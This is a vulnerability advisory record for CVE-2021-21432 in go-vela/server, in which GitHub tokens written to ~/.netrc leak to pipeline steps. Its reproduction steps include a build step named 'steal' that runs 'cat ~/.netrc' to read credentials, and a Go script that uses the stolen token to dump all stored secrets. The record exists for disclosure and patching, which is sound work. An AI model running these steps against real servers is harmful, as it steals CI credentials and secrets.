{"id":"CVE-2021-21432","aliases":["GHSA-8j3f-mhq8-gmh4","GO-2022-0812"],"title":"Reject unauthorized access with GitHub PATs","summary":"Reject unauthorized access with GitHub PATs","severity":"high","cvss":7.5,"cvssVector":"CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L","vendor":"go-vela","product":"github.com/go-vela/server","ecosystem":"go","affected":["github.com/go-vela/server >= 0.7.0, < 0.7.5"],"patched":["github.com/go-vela/server 0.7.5"],"published":"2022-02-15","updated":"2026-07-08","source":"OSV","sourceUrl":"https://osv.dev/vulnerability/GHSA-8j3f-mhq8-gmh4","references":[{"url":"https://github.com/go-vela/server/security/advisories/GHSA-8j3f-mhq8-gmh4"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-21432"},{"url":"https://github.com/go-vela/server/pull/337"},{"url":"https://github.com/go-vela/server/commit/cb4352918b8ecace9fe969b90404d337b0744d46"},{"url":"https://github.com/go-vela/server"},{"url":"https://github.com/go-vela/server/releases/tag/v0.7.5"},{"url":"https://pkg.go.dev/github.com/go-vela/server"}],"tags":["osv","go"],"epss":0.00986,"epssPercentile":0.608,"ingestedAt":"2026-07-09T18:56:36.227Z","slug":"CVE-2021-21432","body":"## Overview\n\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nThe additional auth mechanism added within https://github.com/go-vela/server/pull/246 enables some malicious user to obtain secrets utilizing the injected credentials within the `~/.netrc` file. Steps to reproduce\n\n1. Create Vela server\n2. Login to Vela UI\n3. Promote yourself to Vela administrator \n    - `UPDATE users SET admin = 't' WHERE name = <username>`\n4. Activate repository within Vela\n5. Add `.vela.yml` to the repository with the following content\n\n    \n    ```yaml\n    version: \"1\"\n    \n    steps:\n    - name: steal\n      image: alpine\n      commands:\n        - cat ~/.netrc\n    ```\n\n1. Look at build logs to find the following content\n\n    ```\n    $ cat ~/.netrc\n    machine <GITHUB URL>\n    login x-oauth-basic\n    password <token>\n    ```\n\n1. Copy the password to be utilized in some later step\n1. Add secret(s) to activated repo\n1. Copy the following script into `main.go`\n\n    ```golang\n    package main\n    \n    import (\n\t    \"fmt\"\n\t    \"github.com/go-vela/sdk-go/vela\"\n\t    \"os\"\n    )\n    \n    func main() {\n\t    // create client to connect to vela\n\t    client, err := vela.NewClient(os.Getenv(\"VELA_SERVER_ADDR\"), \"vela\", nil)\n\t    if err != nil {\n\t\t    panic(err)\n\t    }\n    \n\t    // add PAT to request\n\t    client.Authentication.SetPersonalAccessTokenAuth(os.Getenv(\"VELA_TOKEN\"))\n    \n    \n\t    secrets, _, err := client.Admin.Secret.GetAll(&vela.ListOptions{})\n\t    if err != nil {\n\t\t    panic(err)\n\t    }\n    \n\t    for _, secret := range *secrets {\n\t\t    fmt.Println(*secret.Name)\n\t\t    fmt.Println(*secret.Value)\n\t    }\n    }\n    ```\n\n1. Run the `main.go` with environment specific settings\n   - `VELA_SERVER_ADDR=http://localhost:8080 VELA_TOKEN=<token obtained previously> go run main.go`\n\nThe previously posted script could be updated to utilize any API endpoint(s) the activated user has access against.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n* Upgrade to `v0.7.5` or later\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\n* No known workarounds\n\n### References\n_Are there any links users can visit to find out more?_\n\n* https://github.com/go-vela/server/pull/246\n* https://docs.github.com/en/enterprise-server@3.0/rest/reference/apps#check-a-token\n\n### For more information\nIf you have any questions or comments about this advisory\n\n* Email us at [vela@target.com](mailto:vela@target.com)\n\n## Affected packages\n\n- `github.com/go-vela/server >= 0.7.0, < 0.7.5`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `github.com/go-vela/server 0.7.5`","depth":"twilight","depthScore":41,"depthScoreParts":{"impact":41.3,"likelihood":0.2,"exploitation":0,"ransomware":0},"changes":[]}